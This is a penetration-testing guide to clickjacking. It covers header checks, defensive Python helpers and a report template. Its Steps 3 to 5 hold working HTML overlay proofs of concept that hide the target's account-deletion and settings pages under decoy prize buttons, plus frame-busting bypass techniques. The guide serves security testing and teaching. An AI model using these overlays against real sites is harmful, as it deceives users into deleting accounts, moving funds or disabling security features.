Performing Clickjacking Attack Test
When to Use
- During authorized penetration tests when assessing UI redressing vulnerabilities
- When testing whether sensitive actions (delete account, transfer funds, change settings) can be performed via clickjacking
- For evaluating the effectiveness of X-Frame-Options and Content-Security-Policy frame-ancestors directives
- When assessing applications that process one-click actions without additional confirmation
- During security audits of applications handling financial transactions or account management
Prerequisites
- Authorization: Written penetration testing agreement for the target
- Web browser: Modern browser for testing iframe embedding
- Local web server: Python `http.server` or similar for hosting PoC pages
- Burp Suite: For examining response headers
- HTML/CSS knowledge: For crafting clickjacking overlay pages
- curl: For checking framing headers on target pages
Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
Workflow
Step 1: Check Frame Embedding Protections
Examine response headers for anti-clickjacking defenses.
```bash
# Check X-Frame-Options header
curl -s -I "https://target.example.com/" | grep -i "x-frame-options"
# Expected values:
#   X-Frame-Options: DENY          (blocks all framing)
#   X-Frame-Options: SAMEORIGIN    (allows same-origin framing)
#   X-Frame-Options: ALLOW-FROM https://trusted.com (deprecated, limited support)

# Check Content-Security-Policy frame-ancestors directive
curl -s -I "https://target.example.com/" | grep -i "content-security-policy"
# Look for: frame-ancestors 'none' or frame-ancestors 'self'
#   frame-ancestors 'none' = equivalent to DENY
#   frame-ancestors 'self' = equivalent to SAMEORIGIN

# Test multiple sensitive pages
# (the word list is continued with a backslash; without it the shell
#  treats the second line as the loop body and fails with a syntax error)
for page in / /account/settings /account/delete /transfer \
            /admin/dashboard /change-password /change-email; do
  echo -n "$page: "
  headers=$(curl -s -I "https://target.example.com$page")
  xfo=$(echo "$headers" | grep -i "x-frame-options" | tr -d '\r')
  csp=$(echo "$headers" | grep -i "content-security-policy" \
        | grep -o "frame-ancestors[^;]*" | tr -d '\r')
  if [ -z "$xfo" ] && [ -z "$csp" ]; then
    echo "NO PROTECTION"
  else
    echo "${xfo:-none} | ${csp:-none}"
  fi
done

# Check if JavaScript frame-busting is used (weak protection)
# -E is required: plain grep does not treat "|" as alternation
curl -s "https://target.example.com/" | grep -iE "top.location|parent.location|frameElement"
```
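The curl loop above prints raw header lines and leaves the interpretation to the tester. The following Python helper is an added example, not part of the original skill: it applies the rules the step states (an enforcing `frame-ancestors` directive supersedes `X-Frame-Options`, `ALLOW-FROM` is deprecated) and adds one caveat a header scan should not miss, namely that a `Content-Security-Policy-Report-Only` header does not stop framing. The sample responses are constructed; the page paths mirror the ones the loop visits, and no host is contacted.

```python
"""Classify the framing protection of an HTTP response from its headers."""
# Added example, not part of the original skill. All sample responses below are
# constructed; the function only reasons about header text it is handed.


def header_values(headers, name):
    """All values of a header, matched case-insensitively on the name.

    Headers are a list of (name, value) pairs so that repeated headers, which
    are legal for Content-Security-Policy, are all seen rather than merged.
    """
    return [v.strip() for n, v in headers if n.lower() == name.lower()]


def frame_ancestors(headers):
    """Source list of frame-ancestors from the enforcing CSP, or None if absent.

    Only Content-Security-Policy counts; the Report-Only variant is ignored
    because the browser still frames the page and merely sends a report.
    """
    for policy in header_values(headers, "Content-Security-Policy"):
        for directive in policy.split(";"):
            name, _, sources = directive.strip().partition(" ")
            if name.lower() == "frame-ancestors":
                return sources.lower().split()
    return None


def classify_framing_protection(headers):
    """Return a one-line label for the response's framing posture."""
    fa = frame_ancestors(headers)
    if fa is not None:
        # CSP frame-ancestors takes precedence over X-Frame-Options.
        if fa in ([], ["'none'"]):
            return "PROTECTED: frame-ancestors 'none'"
        if fa == ["'self'"]:
            return "PROTECTED: frame-ancestors 'self'"
        if "*" in fa or "https:" in fa or "http:" in fa:
            return "WEAK: frame-ancestors allows any origin (" + " ".join(fa) + ")"
        return "RESTRICTED: frame-ancestors " + " ".join(fa)

    xfo = header_values(headers, "X-Frame-Options")
    if xfo:
        value = xfo[0].upper()
        if value == "DENY":
            return "PROTECTED: X-Frame-Options DENY"
        if value == "SAMEORIGIN":
            return "PROTECTED: X-Frame-Options SAMEORIGIN"
        if value.startswith("ALLOW-FROM"):
            return "WEAK: X-Frame-Options ALLOW-FROM is deprecated and ignored by modern browsers"
        return "WEAK: unrecognised X-Frame-Options value " + xfo[0]

    report_only = header_values(headers, "Content-Security-Policy-Report-Only")
    if any("frame-ancestors" in p.lower() for p in report_only):
        return "NO PROTECTION: frame-ancestors set only in a report-only policy"
    return "NO PROTECTION"


def parse_raw_headers(raw):
    """Turn the text of a `curl -s -I` response into (name, value) pairs."""
    pairs = []
    for line in raw.splitlines():
        line = line.rstrip("\r")
        if ":" in line and not line.startswith("HTTP/"):
            name, _, value = line.partition(":")
            pairs.append((name.strip(), value.strip()))
    return pairs


# Constructed sample responses standing in for the pages the curl loop visits.
SAMPLES = {
    "/account/delete": "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n",
    "/login": "HTTP/1.1 200 OK\r\nX-Frame-Options: SAMEORIGIN\r\n",
    "/transfer": "HTTP/1.1 200 OK\r\nX-Frame-Options: ALLOW-FROM https://trusted.com\r\n",
    "/admin/dashboard": ("HTTP/1.1 200 OK\r\n"
                         "Content-Security-Policy-Report-Only: frame-ancestors 'none'\r\n"),
    "/account/settings": ("HTTP/1.1 200 OK\r\nX-Frame-Options: SAMEORIGIN\r\n"
                          "Content-Security-Policy: default-src 'self'; frame-ancestors 'none'\r\n"),
}


def scan(samples=SAMPLES):
    """Map each page to its label, the same summary the curl loop prints."""
    return {page: classify_framing_protection(parse_raw_headers(raw))
            for page, raw in samples.items()}


if __name__ == "__main__":
    for page, label in scan().items():
        print(f"{page}: {label}")
```

To use it against live output, pipe `curl -s -I` text into `parse_raw_headers` in place of the `SAMPLES` entries; the labels are deliberately coarse so that a run over many pages can be pasted straight into the headers table of the finding.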
Step 2: Test Basic Iframe Embedding
Attempt to embed the target page in an iframe to confirm vulnerability.
```html
<!-- basic-frame-test.html -->
<html>
<head><title>Clickjacking Frame Test</title></head>
<body>
  <h1>Frame Embedding Test</h1>
  <p>If the target page loads below, it is vulnerable to clickjacking.</p>
  <!-- Test basic framing -->
  <iframe src="https://target.example.com/account/settings"
          width="800" height="600"
          style="border: 2px solid red;">
  </iframe>
  <p>If you see "Refused to display" in console or blank iframe,
     the page has frame protection.</p>
</body>
</html>
```

```bash
# Host the test page
cd /tmp
cat > frame-test.html << 'EOF'
<html>
<body>
<h1>Clickjacking Test</h1>
<iframe src="https://target.example.com/account/settings"
        width="800" height="600"></iframe>
</body>
</html>
EOF
python3 -m http.server 8888

# Open http://localhost:8888/frame-test.html in browser
# Check browser console for framing errors
```

Step 3: Craft Clickjacking Proof of Concept
Build an overlay attack that tricks users into clicking hidden elements.
```html
<!-- clickjacking-poc.html -->
<html>
<head>
  <title>Win a Prize!</title>
  <style>
    body {
      margin: 0;
      padding: 0;
      font-family: Arial, sans-serif;
    }
    /* Invisible iframe containing target page */
    #target-frame {
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      opacity: 0.0001; /* Nearly invisible */
      z-index: 2;      /* On top of decoy */
      border: none;
    }
    /* Decoy content that tricks the user */
    #decoy {
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      z-index: 1;
      background: white;
    }
    /* Position the "Click here" button exactly over the target's
       sensitive button (adjust top/left values based on target layout) */
    #click-bait {
      position: absolute;
      top: 350px;  /* Align with target's "Delete Account" button */
      left: 400px; /* Align horizontally */
      padding: 15px 30px;
      background: #4CAF50;
      color: white;
      font-size: 18px;
      cursor: pointer;
      border: none;
      border-radius: 5px;
    }
  </style>
</head>
<body>
  <!-- Decoy content visible to the user -->
  <div id="decoy">
    <h1 style="text-align:center; margin-top:100px;">
      Congratulations! You Won!
    </h1>
    <p style="text-align:center;">
      Click the button below to claim your prize
    </p>
    <button id="click-bait">CLAIM PRIZE</button>
  </div>
  <!-- Hidden iframe with target's sensitive action -->
  <iframe id="target-frame"
          src="https://target.example.com/account/delete"
          scrolling="no">
  </iframe>
</body>
</html>
```

Step 4: Create Multi-Step Clickjacking Attack
For actions requiring multiple clicks, create a multi-step overlay.
```html
<!-- multi-step-clickjacking.html -->
<html>
<head>
  <title>Complete Survey</title>
  <style>
    #target-frame {
      position: absolute;
      width: 100%;
      height: 100%;
      opacity: 0.0001;
      z-index: 2;
      border: none;
    }
    #step-container {
      text-align: center;
      margin-top: 200px;
      z-index: 1;
      position: relative;
    }
    .step { display: none; }
    .step.active { display: block; }
    .btn {
      padding: 15px 40px;
      font-size: 18px;
      background: #2196F3;
      color: white;
      border: none;
      cursor: pointer;
      margin-top: 20px;
    }
  </style>
</head>
<body>
  <div id="step-container">
    <!-- Step 1: Click aligns with "Settings" link on target -->
    <div class="step active" id="step1">
      <h2>Step 1: Select your reward</h2>
      <button class="btn" onclick="nextStep()"
              style="position:absolute; top:200px; left:300px;">
        Gold Package
      </button>
    </div>
    <!-- Step 2: Click aligns with "Delete Account" button -->
    <div class="step" id="step2">
      <h2>Step 2: Confirm your choice</h2>
      <button class="btn" onclick="nextStep()"
              style="position:absolute; top:350px; left:400px;">
        Confirm
      </button>
    </div>
    <!-- Step 3: Click aligns with "Yes, I'm sure" confirmation -->
    <div class="step" id="step3">
      <h2>Step 3: Claim reward!</h2>
      <button class="btn"
              style="position:absolute; top:400px; left:450px;">
        Claim Now!
      </button>
    </div>
  </div>
  <iframe id="target-frame"
          src="https://target.example.com/account/settings">
  </iframe>
  <script>
    var currentStep = 1;
    function nextStep() {
      document.getElementById('step' + currentStep).classList.remove('active');
      currentStep++;
      document.getElementById('step' + currentStep).classList.add('active');
      // Optionally change iframe src for multi-page flows
    }
  </script>
</body>
</html>
```

Step 5: Test Frame-Busting Bypass Techniques
If JavaScript-based frame protection is used, attempt to bypass it.
```html
<!-- Bypass frame-busting JavaScript -->

<!-- Technique 1: sandbox attribute blocks top-level navigation -->
<iframe src="https://target.example.com/account/settings"
        sandbox="allow-scripts allow-forms allow-same-origin"
        width="800" height="600">
</iframe>
<!-- sandbox without allow-top-navigation prevents frame-busting -->

<!-- Technique 2: Double framing -->
<!-- If target checks: if (top !== self) top.location = self.location -->
<!-- Frame the page through an intermediate page that also frames -->
<iframe src="intermediate.html" width="800" height="600"></iframe>
<!-- intermediate.html contains: <iframe src="https://target.example.com/..."> -->

<!-- Technique 3: Intercept onbeforeunload -->
<script>
  window.onbeforeunload = function() {
    return "Are you sure?"; // Prevents navigation away
  };
</script>
<iframe src="https://target.example.com/account/settings"
        width="800" height="600">
</iframe>

<!-- Technique 4: Using data: URI or about:blank -->
<iframe id="f" src="about:blank" width="800" height="600"></iframe>
<script>
  var iframe = document.getElementById('f');
  iframe.contentDocument.write(
    '<iframe src="https://target.example.com/account/settings" width="100%" height="100%"></iframe>'
  );
</script>
```

Step 6: Validate Impact and Document Finding
Confirm that the clickjacking leads to meaningful impact.
```bash
# Host the PoC and test the attack flow
cd /tmp
python3 -m http.server 8888

# Testing steps:
# 1. Log in to target.example.com in the browser
# 3. Click the decoy button
# 4. Verify the sensitive action was performed on the target

# For report: adjust iframe opacity to show overlap
# Change opacity from 0.0001 to 0.5 for screenshot evidence
# This shows the target page visible behind the decoy content

# Document which sensitive actions are vulnerable:
# - Account deletion
# - Password/email change
# - Fund transfer
# - Permission/role changes
# - Enabling/disabling security features
```

Key Concepts
| Concept | Description |
|---|---|
| Clickjacking | UI redressing attack that tricks users into clicking hidden elements by overlaying decoy content |
| X-Frame-Options | HTTP header controlling whether a page can be embedded in iframes (DENY, SAMEORIGIN) |
| frame-ancestors | CSP directive specifying valid parents for iframe embedding (supersedes X-Frame-Options) |
| Frame Busting | JavaScript-based defense that attempts to break out of iframes (easily bypassable) |
| Likejacking | Clickjacking variant targeting social media "Like" or "Share" buttons |
| Cursorjacking | Variant using CSS to offset the visible cursor from the actual click position |
| Multi-step Clickjacking | Attack requiring multiple clicks, with decoy content changing at each step |
Tools & Systems
| Tool | Purpose |
|---|---|
| Burp Suite Professional | Examining X-Frame-Options and CSP headers on responses |
| Clickjack Tester (browser) | Browser-based iframe embedding test tool |
| Browser DevTools | Inspecting frame embedding behavior and console errors |
| Python http.server | Hosting clickjacking PoC pages locally |
| OWASP ZAP | Automated detection of missing anti-framing headers |
| securityheaders.com | Online scanner for missing security headers |
Common Scenarios
Scenario 1: Account Deletion via Clickjacking
The account deletion page at `/account/delete` has no X-Frame-Options header. An attacker creates a page with a "Win a prize" button positioned over the "Delete My Account" button in a transparent iframe.
Scenario 2: One-Click Fund Transfer
A banking application performs transfers via a single button click on a pre-filled form. Without frame protection, the attacker embeds the transfer page in an iframe and overlays a decoy "Play Game" button.
Scenario 3: 2FA Disable via Multi-Step Clickjacking
Disabling two-factor authentication requires two clicks (settings link, then disable button). A multi-step clickjacking PoC guides the victim through two decoy clicks that align with the real buttons.
Scenario 4: OAuth Authorization Clickjack
An OAuth consent screen allows framing. The attacker embeds the consent page and tricks the victim into clicking "Authorize", granting the attacker's application access to the victim's account.
Output Format
Clickjacking Vulnerability Finding
Vulnerability: Clickjacking - Missing Frame Embedding Protection
Severity: Medium (CVSS 6.1)
Location: /account/settings, /account/delete, /transfer
OWASP Category: A04:2021 - Insecure Design
Headers Analysis
| Page | X-Frame-Options | CSP frame-ancestors | Vulnerable |
|---|---|---|---|
| / | Not set | Not set | Yes |
| /account/settings | Not set | Not set | Yes |
| /account/delete | Not set | Not set | Yes |
| /transfer | Not set | Not set | Yes |
| /login | SAMEORIGIN | - | No |
Sensitive Actions Exploitable
- Account deletion (single click, no re-authentication)
- Email change (single click, no confirmation)
- 2FA disable (two clicks, multi-step PoC)
- Fund transfer (pre-filled form, single click)
Impact
- Account takeover via email change clickjacking
- Account destruction via delete clickjacking
- Financial loss via transfer clickjacking
- Security downgrade via 2FA disable clickjacking
Recommendation
- Add `Content-Security-Policy: frame-ancestors 'none'` to all pages
- Set `X-Frame-Options: DENY` as fallback for older browsers
- Require re-authentication for sensitive actions (delete, transfer)
- Add confirmation dialogs that cannot be pre-filled or auto-submitted
- Implement SameSite=Strict cookies to reduce session availability in frames
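The recommendation lists the headers and cookie attribute a fixed application should send; the following is an added example, not part of the original skill, showing what that looks like in the same `http.server` module the skill uses for hosting PoC pages, turned round to serve hardened responses. The handler class, the port `8889` and the cookie name `session` are placeholders chosen for the example; the header values are exactly the ones the recommendation names.

```python
"""Serve responses carrying the anti-framing controls the recommendation lists."""
# Added example, not part of the original skill. Port and cookie name are
# placeholders; the header values are the ones the recommendation prescribes.
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer


def hardening_headers():
    """Headers every response should carry.

    frame-ancestors 'none' is the primary control (CSP level 2 and later);
    X-Frame-Options DENY is the fallback for browsers without CSP support.
    Both express the same policy, so a browser honouring either refuses to
    render the page inside a frame, which removes the clickjacking surface.
    """
    return [
        ("Content-Security-Policy", "frame-ancestors 'none'"),
        ("X-Frame-Options", "DENY"),
    ]


def session_cookie_header(value, name="session"):
    """Set-Cookie value for a session cookie that is withheld from framed loads.

    SameSite=Strict keeps the cookie out of cross-site requests, and the
    request that loads a cross-site iframe is one of them, so a framed copy
    of the page renders logged-out and a redirected click acts on no session.
    Secure and HttpOnly are standard session-cookie hygiene, not clickjacking
    controls, and are included so the value is deployable as written.
    """
    return f"{name}={value}; Path=/; Secure; HttpOnly; SameSite=Strict"


class FramingProtectedHandler(SimpleHTTPRequestHandler):
    """SimpleHTTPRequestHandler that appends the anti-framing headers to every response."""

    def end_headers(self):
        # end_headers() is the one hook every response passes through, so the
        # headers are added to file responses, directory listings and errors alike.
        for name, value in hardening_headers():
            self.send_header(name, value)
        super().end_headers()


def has_framing_protection(headers):
    """True if a (name, value) header list carries either anti-framing control.

    Handy as a unit check on any response object before a release, mirroring
    the curl check in Step 1 from the defending side.
    """
    lookup = {n.lower(): v for n, v in headers}
    return (lookup.get("x-frame-options", "").upper() in ("DENY", "SAMEORIGIN")
            or "frame-ancestors" in lookup.get("content-security-policy", "").lower())


if __name__ == "__main__":
    # Serves the current directory on a placeholder port; verify with
    #   curl -s -I http://127.0.0.1:8889/ | grep -iE "x-frame-options|content-security-policy"
    with ThreadingHTTPServer(("127.0.0.1", 8889), FramingProtectedHandler) as httpd:
        httpd.serve_forever()
```

Running the Step 1 curl loop against this server should report both headers on every page; the re-authentication and confirmation-dialog items in the recommendation are application logic and are not covered by a header-only fix.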